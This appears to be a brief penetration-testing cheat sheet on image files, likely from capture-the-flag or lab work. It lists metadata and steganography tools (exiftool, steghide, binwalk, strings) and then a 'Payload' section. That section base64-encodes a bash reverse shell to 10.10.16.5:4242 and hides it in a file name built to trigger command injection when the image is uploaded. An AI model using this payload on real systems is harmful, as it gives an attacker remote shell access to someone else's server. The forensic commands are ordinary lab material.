Extract

Get metadata

exiftool *.jpg

Get hidden data

steghide extract -sf *.jpg

Identifying files and code embedded

binwalk -h binwalk might need additional dependency http://www.infotinks.com/binwalk-tutorial/

Not intuitive, albeit it exists

strings

Payload

upload image to trigger command injection

echo -n "bash -c 'bash -i >& /dev/tcp/10.10.16.5/4242 0>&1'" | base64
touch 'shell.jpg; `echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41LzQyNDIgMD4mMSc= | base64 -d | bash `;'